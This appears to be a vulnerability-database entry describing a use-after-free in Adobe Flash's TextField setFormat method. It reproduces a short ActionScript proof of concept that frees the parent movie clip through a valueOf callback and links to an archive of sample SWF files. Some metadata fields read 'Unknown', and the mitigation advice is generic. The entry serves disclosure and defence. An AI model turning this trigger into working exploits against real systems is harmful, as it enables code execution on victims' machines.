Use-After-Free in TextField setFormat Method

vendor:

Adobe Flash

by:

Unknown

7.5

CVSS

HIGH

Use-After-Free

416

CWE

Product Name: Adobe Flash

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: a:adobe:flash

Metasploit:

Other Scripts:

Platforms Tested: Adobe Flash (SWF) files are supported on various platforms including Windows, Mac, and Linux.

Unknown

Use-After-Free in TextField setFormat Method

The TextField setFormat method in Adobe Flash contains a use-after-free vulnerability. By passing an object parameter with a defined valueOf function, or by overriding a constructor of the object parameter, an attacker can free the TextField parent object. This can lead to subsequent use of the freed object, potentially allowing for arbitrary code execution.

Mitigation:

To mitigate this vulnerability, developers should ensure that the TextField parent object is not freed prematurely. Additionally, it is recommended to update to the latest version of Adobe Flash, as this vulnerability may have been patched.

Source

Exploit-DB raw data:

Source: https://code.google.com/p/google-security-research/issues/detail?id=586

The TextField setFormat method contains a use-after-free. If an integer parameter has valueOf defined, or the object parameter overrides a constructor, this method can free the TextField parent, which is subsequently used.

A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
var f = new TextFormat();
tf.setFormat( {valueOf : func}, 2, f);

function func(){

        if(times == 0){
             times++;
             return 0;

         }

	mc.removeMovieClip();

        // Fix heap here

	return 0;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39046.zip